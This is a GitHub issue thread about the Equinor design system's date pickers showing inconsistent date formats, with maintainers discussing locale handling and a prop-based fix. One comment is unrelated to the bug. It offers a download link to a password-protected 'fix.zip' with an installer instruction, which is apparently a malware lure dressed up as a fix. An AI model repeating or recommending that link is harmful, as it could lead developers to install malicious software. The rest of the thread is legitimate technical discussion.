### ISSUE TITLE
Data pickers show random dateformats

### ISSUE THREAD

**Issue by jarlef** [equinor/design-system#3596]
**Describe the bug**

We are trying to use the DatePicker and DateRangePicker but we struggling to let them consistently 

For some users they get the format mm/dd/yyyy instead of dd/mm/yyyy

Wrong format
![Screenshot 2024-08-26 at 14 00 49](https://github.com/user-attachments/assets/81002a87-f63b-4cd8-9e39-7bf94fd9ffb2)

Correct format
<img width="309" alt="Screenshot 2024-08-26 at 14 01 06" src="https://github.com/user-attachments/assets/d28bd4a2-505d-46d3-a8e7-a5439825937d">

Also the component uses random separator in different browsers on my own machine

Chrome
![Screenshot 2024-08-26 at 14 04 34](https://github.com/user-attachments/assets/967c51c9-b54d-49a1-8049-21cf56cc0c9c)

Brave
<img width="309" alt="Screenshot 2024-08-26 at 14 01 06" src="https://github.com/user-attachments/assets/9d0bf1f2-58e2-4446-a357-2997ff83d992">

We have tried setting the locale to en-GB for the entire react application 

```tsx 
<I18nProvider locale="en-GB">
...
</I18nProvider>
```

**Steps to reproduce the bug**

1.
2.
3.
4.

**Expected behavior**

A consistent date format across users and browsers to avoid confusion on what the date since showing the date `02/06/2025`  as `06/02/2025` can have big consequences if the the users misunderstands the date

There should also be an ability to set the format manually, at least the separator. E.g `dd.mm.yyyy` instead of `dd/mm/yyyy`

**Specifications**

- Version:
- Browser:
- OS:

**Additional context**

Add any other context or screenshots about the bug. An example in [CodeSandbox](https://codesandbox.io/) is very helpful

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yusijs** [comment]
I created a ticket with the react-aria folks a while back and was hoping they would be able to provide a proper fix for it, where they default to the system locale rather than the browser locale. They were hesitant to change it, since that would be a breaking change. 

I'll look into simplifying setting the locale so it can be passed with a prop. 

Re. the separators, I'm not sure I would commit to a change there, since those are locale-determined, but I'll see if there is anything we can do. Hopefully it would be a good enough fix to ensure the locale was more.. streamlined.🤞

**Comment by jarlef** [comment]
BTW. Instead of relying the react-arias I18nProvider context, couldn't you just extend the EdsProvider context with an additional locale prop which is used by the date components?

**Comment by yusijs** [comment]
@jarlef We agreed to skip EdsProvider as an option, as it will be deprecated sometime in the future. 

The way I have implemented it now is to use a priority of direct prop `<Datepicker locale="..." />`, then the value from I18nProvider (if it differs from the fallback value from react-aria), and lastly default to the system value via `Intl.DateFormat().resolvedOptions.locale`, which is more correct than the react-aria default
